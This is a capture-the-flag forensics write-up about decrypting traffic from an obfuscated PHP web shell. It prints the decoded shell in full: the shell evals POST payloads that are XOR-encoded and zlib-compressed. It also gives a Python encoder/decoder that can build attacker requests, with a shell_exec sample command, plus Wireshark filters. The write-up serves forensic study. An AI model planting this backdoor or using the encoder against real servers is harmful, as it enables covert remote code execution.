DESCRIPTION
You have to investigate a recent attack on your web server. Since the attackers were very skilled, they used a specially designed PHP shell to access the server. Your friends from the Incident Response Department managed to get a network capture file with the malicious traffic. The secret flag, which the attackers used, is in the PCAP file. All evidence (including the PHP shell code) is here: http://10.195.165.94/forensics/shell_code.zip
QUESTION
Can you decrypt the web shell command responses?
// Decoded shellcode (the PHP shell from shell_code.zip after de-obfuscation)
<?php
// Repeating-key XOR: byte $i of $t is XORed with byte ($i mod strlen($k)) of $k.
// XOR is its own inverse, so the same function encrypts requests and decrypts responses.
function x($t, $k) {
    $c = strlen($k);
    $l = strlen($t);
    $o = "";
    for ($i = 0; $i < $l;) {
        for ($j = 0; ($j < $c && $i < $l); $j++, $i++) {
            $o .= $t[$i] ^ $k[$j]; // the original uses $t{$i}; brace string offsets were removed in PHP 8
        }
    }
    return $o;
}

$k  = "4696bd9a";         // XOR key
$kh = "8ecf79155df0";     // header marker: start of the encoded blob
$kf = "5fb97fdc8317";     // footer marker: end of the encoded blob
$p  = "BL450mL1WeCi9eMA"; // prefix printed in front of every response

// Request side: the POST body must contain $kh<base64>$kf. The base64 payload is
// XOR-decoded with $k, inflated with gzuncompress (zlib format) and eval'd, with
// its output captured in an output buffer.
if (@preg_match("/$kh(.+)$kf/", @file_get_contents("php://input"), $m) == 1) {
    @ob_start();
    eval(@gzuncompress(@x(base64_decode($m[1]), $k)));
    $o = @ob_get_contents();
    @ob_end_clean();
    // Response side: the captured output is gzcompressed, XORed with the same key,
    // base64-encoded and printed as $p$kh<base64>$kf.
    $r = @base64_encode(@x(@gzcompress($o), $k));
    print("$p$kh$r$kf");
}
Algorithm description:
• Take the POST input (php://input)
• Take the substring starting with 8ecf79155df0 and ending with 5fb97fdc8317
• Everything in between is:
  • base64 decoded
  • XOR decoded with the repeating key 4696bd9a
  • zlib uncompressed (gzuncompress; this is zlib/RFC 1950 data, not a gzip file)
  • then eval'd, with its output buffered
• The response is built the same way in reverse: the buffered output is gzcompressed, XORed with 4696bd9a, base64 encoded and printed as BL450mL1WeCi9eMA8ecf79155df0<base64>5fb97fdc8317, so the replies in the PCAP decode with exactly the same steps (base64 decode, XOR, gzuncompress).
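The request and response transform described above, as an added Python example that is not part of the original write-up or of the shell itself. The key, the two markers and the response prefix are the shell's own constants; the command string and the command output are constructed sample data, not taken from the challenge PCAP. PHP's gzcompress/gzuncompress produce and consume zlib (RFC 1950) streams, which is why zlib.compress/zlib.decompress are used rather than the gzip module.

```python
import base64
import re
import zlib

# Constants taken from the decoded shell on this page.
K = b"4696bd9a"             # $k, repeating XOR key
KH = b"8ecf79155df0"        # $kh, header marker
KF = b"5fb97fdc8317"        # $kf, footer marker
P = b"BL450mL1WeCi9eMA"     # $p, prefix the shell prints before every response


def xor(data: bytes, key: bytes) -> bytes:
    """Repeating-key XOR, byte-for-byte equivalent to the shell's x($t, $k).
    XOR is its own inverse, so the same call encrypts and decrypts."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def wrap(payload: bytes, prefix: bytes = b"") -> bytes:
    """Encode the way the attacker's client (request) or the shell (response) does:
    gzcompress -> XOR with K -> base64, framed by KH ... KF.
    gzcompress() emits zlib (RFC 1950) data, i.e. zlib.compress(), not gzip."""
    return prefix + KH + base64.b64encode(xor(zlib.compress(payload), K)) + KF


def unwrap(body: bytes) -> bytes:
    """Decode a captured HTTP body: locate KH(.+)KF like the shell's preg_match,
    then base64 -> XOR with K -> gzuncompress (zlib.decompress)."""
    m = re.search(re.escape(KH) + rb"(.+)" + re.escape(KF), body)
    if m is None:
        raise ValueError("no shell framing markers in body")
    return zlib.decompress(xor(base64.b64decode(m.group(1)), K))


def decode_message(body: bytes):
    """Classify a body pulled from the PCAP and decode it.
    Responses are the ones that carry the P prefix right before KH;
    requests (the POST bodies) do not."""
    kind = "response" if P + KH in body else "request"
    return kind, unwrap(body)


# Constructed sample traffic (assumption, not from the challenge capture):
# what an attacker's client would POST, and what the shell would answer.
SAMPLE_REQUEST = wrap(b"echo shell_exec('id');")
SAMPLE_RESPONSE = wrap(
    b"uid=33(www-data) gid=33(www-data) groups=33(www-data)\n", prefix=P
)

if __name__ == "__main__":
    for body in (SAMPLE_REQUEST, SAMPLE_RESPONSE):
        kind, plain = decode_message(body)
        print(kind, plain.decode())
```

To use this on the real capture, export each matching HTTP request and response body from Wireshark (Follow TCP Stream, or File > Export Objects > HTTP) and feed the raw bytes to decode_message(); the greedy (.+) mirrors the shell's regex, so pass one message at a time rather than a whole stream.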
Wireshark display filter for the attacker's requests (string literals take double quotes in Wireshark filters):
tcp contains "8ecf79155df0" and http.method == "POST"
The shell's replies carry the same 8ecf79155df0 marker after the BL450mL1WeCi9eMA prefix but are HTTP responses, not POSTs, so drop the http.method clause (or use http.response && tcp contains "8ecf79155df0") to see both directions of the conversation.
See essentially the same challenge: https://joshuanatan.medium.com/hack-bfc7c6528463